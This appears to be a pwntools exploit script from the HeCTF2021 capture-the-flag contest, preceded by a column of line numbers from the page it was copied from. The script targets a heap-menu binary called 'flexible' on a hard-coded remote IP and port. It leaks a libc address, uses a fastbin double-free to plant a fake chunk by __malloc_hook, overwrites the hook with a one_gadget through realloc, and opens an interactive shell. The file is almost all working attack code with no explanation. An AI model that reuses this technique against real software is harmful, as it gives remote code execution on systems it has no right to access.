HeCTF2021

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 2
filename = 'flexible'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('123.56.242.200 ',10004)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF(filename)
# libc = elf.libc
libc = ELF("./libc-2.23.so")

def cmd(index):
    p.sendlineafter('choice >>',str(index))

def add(index,size,name,content):
    cmd(1)
    p.sendlineafter('Choice your index >>',str(index))
    p.sendlineafter('size >>',str(size))
    p.sendlineafter('what is your name >>',str(name))
    p.sendlineafter('Input your context >>',content)

def edit(index,content):
    cmd(2)
    p.sendlineafter('Choice your index >',str(index))
    p.sendlineafter('Input your context >>',content)

def free(index):
    cmd(3)
    p.sendlineafter('Choice your index >',str(index))

def show(index):
    cmd(4)
    p.sendlineafter('Choice your index >',str(index))



add(0,0x70,'a','b')
add(1,0x70,'a','b')
add(2,0x50,'a','b')
add(3,0x50,'a','b')
add(4,0x50,'a','b')
add(5,0x50,'a','b')
add(6,0x50,'a','b')

free(1)
show(1)


main_arena_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -88
malloc_hook = main_arena_addr - 0x10

libc_base = malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
realloc = libc_base + libc.sym['realloc']

fake_fast_addr = free_hook - 0x13
fake_fast_addr = malloc_hook - 0x23

one_16 = [0x45226,0x4527a,0xf03a4,0xf1247]

one_gadget = libc_base + one_16[1]

free(3)
free(4)
free(3)

add(3,0x50,p64(fake_fast_addr),'')
add(4,0x50,p64(fake_fast_addr),'')
add(5,0x50,p64(fake_fast_addr),'')
add(6,0x50,'','')






payload = '\x00'*0xb + p64(one_gadget) + p64(realloc + 14 )
edit(6,payload)






log.success('libc_base: ' + hex(libc_base)) 
log.success('main_arena_addr: ' + hex(main_arena_addr)) 
log.success('malloc_hook: ' + hex(malloc_hook)) 
log.success('system_addr: ' + hex(system_addr)) 
log.success('free_hook: ' + hex(free_hook)) 
log.success('fake_fast_addr: ' + hex(fake_fast_addr)) 


# add(6,0x20,'a','b')
# gdb.attach(p)


p.interactive()